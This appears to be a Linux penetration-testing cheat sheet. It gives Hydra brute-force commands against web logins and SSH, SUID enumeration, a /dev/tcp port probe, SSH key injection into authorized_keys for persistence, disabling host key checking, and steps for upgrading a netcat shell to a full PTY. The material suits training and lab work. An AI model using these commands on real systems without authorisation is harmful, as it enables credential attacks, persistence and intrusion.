Linux

Generate `/etc/shadow` Password

openssl passwd -6 -salt salty Password123$

genpasswd() { openssl passwd -6 -salt $1 $2 }
genpasswd salty Password123$

Extract all URLs

grep -Eo "https?://[a-zA-Z0-9./?=_%:;#&-]*" inlanefreight | sort -u
...
https://www.inlanefreight.com/index.php/wp-json/
https://www.inlanefreight.com/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.inlanefreight.com%2F
https://www.inlanefreight.com/index.php/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.inlanefreight.com%2F&#038;format=xml
https://www.inlanefreight.com/index.php/wp-json/wp/v2/pages/7
https://www.inlanefreight.com/wp-content/themes/ben_theme/css/animate.css?ver=5.6.14
...

Hydra

hydra -l <username> -P <path/to/passwords> <IP> http-post-form "/route/to/login:username=^USER^&password=^PASS^:<Message If Login Is Incorrect>"

hydra -L users.txt -e s 10.129.1.198 http-post-form '/zabbix/index.php:name=^USER^&password=^PASS^&autologin=1&enter=Sign+in:is incorrect'

SSH

hydra -l <username> -P <path/to/passwords> <IP> ssh -t 4

Find all the SUID/SGID executables

# Find SUID files
find / -perm -4000 -type f -ls 2>/dev/null

# Find SUID files for USER
find / -perm -4000 -type f -user USER -ls 2>/dev/null

# Find SUID files for GROUP
find / -perm -4000 -type f -group GROUP -ls 2>/dev/null

# Find SUID files for USER or GROUP
find / -type f -a \( -perm -u+s -o -perm -g+s \) -ls 2>/dev/null

Port Scan with Bash

host='1.2.3.4' # IP or Host
port='80'
(echo >/dev/tcp/${host}/${port}) &>/dev/null && echo "open" || echo "closed"

SSH

Upgrade to SSH

Local

ssh-keygen -f id_rsa -P x -q
echo "mkdir ~/.ssh; echo '$(cat id_rsa.pub)' > ~/.ssh/authorized_keys"

Remote

mkdir ~/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1...wfXNOycqlPRe user@host' > ~/.ssh/authorized_keys

Always agree to PublicKey on ssh connect

└─$ cat ~/.ssh/config
Host *
    StrictHostKeyChecking no
    UserKnownHostsFile=/dev/null

Connect to ssh with password

# Just connect
sshpass -p 'Password123$' ssh user@domain.tld

# Connect and perform port forwarding from remote to local
sshpass -p 'Password123$' ssh user@domain.tld -L 8500:0:8500

Note:Also works with other services like ftp

Upgrade netcat (nc)

Get PTY
- python3 -c 'import pty;pty.spawn("/bin/bash")'
  - or
- script /dev/null -qc /bin/bash
Background the process
- Ctrl+Z
Get your terminals rows and columns
- tput lines;tput cols
Enter command and then press ENTER twice to bring the session back
- stty raw -echo;fg
For better text wrapping
- stty rows <rows> cols <columns>
To be able to use the clear command
- export TERM=xterm

python3 -c 'import pty;pty.spawn("/bin/bash")'
script /dev/null -qc /bin/bash
---
stty raw -echo;fg;

stty rows 47 cols 211;export TERM=xterm

Note:This doesn't work with rlwrap!

PreviousEtc NextWeb

Last updated 8 months ago

hashtagGenerate /etc/shadow Password

hashtagExtract all URLs

hashtagHydra

hashtagHTTP Form Login

hashtagUse login as password

hashtagSSH

hashtagFind all the SUID/SGID executables

hashtagPort Scan with Bash

hashtagSSH

hashtagUpgrade to SSH

hashtagAlways agree to PublicKey on ssh connect

hashtagConnect to ssh with password

hashtagUpgrade netcat (nc)

Generate `/etc/shadow` Password

Extract all URLs

Hydra

HTTP Form Login

Use login as password

SSH

Find all the SUID/SGID executables

Port Scan with Bash

SSH

Upgrade to SSH

Always agree to PublicKey on ssh connect

Connect to ssh with password

Upgrade netcat (nc)